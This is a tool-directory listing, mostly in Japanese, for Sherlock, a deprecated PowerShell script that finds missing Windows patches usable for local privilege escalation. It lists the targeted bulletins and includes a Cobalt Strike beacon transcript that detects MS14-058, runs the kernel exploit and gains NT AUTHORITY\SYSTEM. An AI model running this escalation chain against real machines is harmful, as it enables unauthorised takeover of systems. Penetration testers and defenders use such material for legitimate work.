Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Sherlock — ローカル特権昇格の脆弱性に対する不足しているソフトウェアパッチを素早く見つけるPowerShellスクリプト。 | Kitploit
ツール/GitHubGitHub/rasta-mouse/sherlock
特権昇格脆弱性分析エクスプロイトポストエクスプロイトペネトレーションテストArchived
GitHubrasta-mouse/sherlock

Sherlock

ローカル特権昇格の脆弱性に対する不足しているソフトウェアパッチを素早く見つけるPowerShellスクリプト。

リポジトリを見る
2.0k409137年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

非推奨です。代わりに Watson をご覧ください。

Sherlock

ローカル特権昇格の脆弱性に対する不足しているソフトウェアパッチを迅速に見つけるためのPowerShellスクリプト。

現在検出可能な脆弱性:

  • MS10-015 : ユーザーモードからリングへの移行 (KiTrap0D)
  • MS10-092 : タスクスケジューラ
  • MS13-053 : NTUserMessageCall Win32k カーネルプールオーバーフロー
  • MS13-081 : TrackPopupMenuEx Win32k NULL ページ
  • MS14-058 : TrackPopupMenu Win32k ヌルポインタデリファレンス
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : フォントドライババッファオーバーフロー
  • MS16-016 : 'mrxdav.sys' WebDAV
  • MS16-032 : セカンダリログオンハンドル
  • MS16-034 : Windows カーネルモードドライバのEoP
  • MS16-135 : Win32k 権限昇格
  • CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 権限昇格

基本的な使い方:

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-MS14058
[*] Tasked beacon to run: Find-MS14058
[+] host called home, sent: 20 bytes
[+] received output:

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)
ツールをダウンロード